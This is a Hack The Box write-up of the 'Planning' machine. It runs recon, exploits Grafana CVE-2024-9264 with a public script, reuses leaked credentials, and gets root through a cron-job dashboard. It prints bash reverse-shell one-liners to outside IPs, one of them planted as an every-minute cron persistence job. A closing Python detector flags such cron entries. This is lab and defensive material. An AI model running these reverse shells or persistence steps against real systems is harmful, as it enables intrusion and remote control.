Planning

Easy Linux HTB box with the given credentials: admin | 0D5oT70Fq13EvB5r

Reconnaissance

As always, we start off by performing a basic Nmap scan

nmap -sCV -p- --open -Pn -n -sS --min-rate 5000 -oN Scan 10.10.11.68

As we can see, we found ports 80 (HTTP) and 22 (SSH), and the OS: Ubuntu

We can also notice that this web page is using Virtual Hosting for planning.htb. So we add it to our /etc/hosts file and it redirects us successfully.

Using whatweb we find the following technologies for the web page

We can see the title "Edukate - Online Education Website", which we visit in our browser

After navigating we find a "Contact" form, but it doesn't appear to be useful, so we'll move on to the next section: directory brute-forcing with gobuster, using the -x php flag as we know the site is using PHP

gobuster dir -u http://planning.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php

We don't seem to find anything important with our directory brute-forcing, so we move on to subdomain brute-forcing with gobuster again

gobuster dns -d planning.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt

But we don't seem to find anything useful either

We try to intercept the HTTP traffic using BurpSuite on the /enroll.php page

Trying to see if this form is vulnerable to XSS using the payload <script>alert(1)</script>

We see it gives us an error (500 Internal Server Error), but it doesn't seem vulnerable to XSS because the payload isn't reflected on screen; it just gives us a blank page where we see that the web app is crashing.

We try brute-forcing the directories and subdomains again with gobuster using other wordlists and finally we find a subdomain: grafana.planning.htb

We add it to our /etc/hosts file and open it in our browser

We get a login panel with the title "Grafana", and we log in with the given credentials admin:0D5oT70Fq13EvB5r

Exploiting Grafana

We log into a dashboard panel

We find nothing useful when exploring the dashboard, so we proceed to look for exploits and find an available exploit on GitHub: CVE-2024-9264

We download the Python script from the GitHub repo, install the dependencies and run the command

We see that we can read the /etc/passwd file using the exploit, and we can also use it to inject commands, so we proceed to get a reverse shell on our system

We execute the following command

python cve.py -u admin -p 0D5oT70Fq13EvB5r -c 'bash -c "bash -i >& /dev/tcp/10.10.14.225/1336 0>&1"' http://grafana.planning.htb/


And we successfully get a reverse shell as root!

We don't find any flags, which is likely because we are inside a Docker container

Privilege Escalation

After checking the environment variables, we find this:

We can see there is a plaintext password (RioTecRANDEntANT!) and a username (enzo)

We try to log in as this user through SSH...

Success! We managed to log in as the enzo user using SSH

We can see the user flag there, and we also see a Linux privilege escalation script we all know: linpeas.sh. We run it with the command bash linpeas.sh and find that there is a web server running on TCP port 8000

We forward that port to our localhost:8000 using

ssh -L 8000:localhost:8000 enzo@planning.htb

And it asks us for a username and password

Investigating the file system, we find /opt/crontabs/crontab.db containing a password: P4ssw0rdS0pRi0T3c

We find a Cronjobs dashboard, where we select + New and add our own cron job:

We set a cron job that sends a reverse shell to our attacker IP on port 1337 every minute

After multiple tries we find that the only command that works is

bash -c 'exec bash -i &>/dev/tcp/10.10.14.99/1337 <&1'

And finally, we get the root flag!!
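From the defender's side, the persistence step above leaves a clear trace in crontab.db: a job whose command is a shell callback, scheduled every minute. The following is an added example (not from the original writeup or from the box) that scans a crontab.db and flags such jobs; it assumes the NeDB-style layout of one JSON document per line with name, command and schedule fields, and uses a constructed sample file.

```python
import json
import re
from typing import Iterator

# Indicators for the reverse-shell shapes seen in this writeup
# (bash /dev/tcp redirection plus an interactive shell); extend for your estate.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),  # bash network pseudo-device
    re.compile(r"\bbash\s+-i\b"),                         # interactive shell from a non-interactive job
    re.compile(r"(?:>&|&>|<&)\s*\d|\d>&\d"),               # fd juggling typical of shell callbacks
]

def parse_crontab_db(text: str) -> Iterator[dict]:
    """Parse a NeDB-style crontab.db: one JSON document per line (assumed format)."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue  # NeDB files can hold compaction leftovers; skip unparsable lines

def score_job(job: dict) -> list:
    """Return the indicator names that fire on a single job's command string."""
    cmd = str(job.get("command", ""))
    hits = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
    # A callback-shaped command scheduled every minute is the classic persistence beacon.
    if hits and str(job.get("schedule", "")).startswith("* * * * *"):
        hits.append("every-minute schedule")
    return hits

def find_suspicious_jobs(text: str) -> list:
    """Return (job name, indicators) for every job that triggers at least one indicator."""
    findings = []
    for job in parse_crontab_db(text):
        hits = score_job(job)
        if hits:
            findings.append((job.get("name", "<unnamed>"), hits))
    return findings

# Constructed sample crontab.db contents (not the box's real file).
SAMPLE_DB = "\n".join([
    json.dumps({"name": "Cleanup", "command": "/root/scripts/cleanup.sh", "schedule": "* * * * *", "_id": "a1"}),
    json.dumps({"name": "Backup", "command": "/usr/bin/tar czf /backup.tgz /var/www", "schedule": "0 2 * * *", "_id": "b2"}),
    json.dumps({"name": "test", "command": "bash -c 'exec bash -i &>/dev/tcp/10.10.14.99/1337 <&1'", "schedule": "* * * * *", "_id": "c3"}),
])

if __name__ == "__main__":
    for name, hits in find_suspicious_jobs(SAMPLE_DB):
        print(f"[!] job {name!r}: {', '.join(hits)}")
```

Running it against the sample flags only the "test" job, with all three command indicators and the every-minute schedule; the legitimate every-minute cleanup job is not flagged because its command matches nothing.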
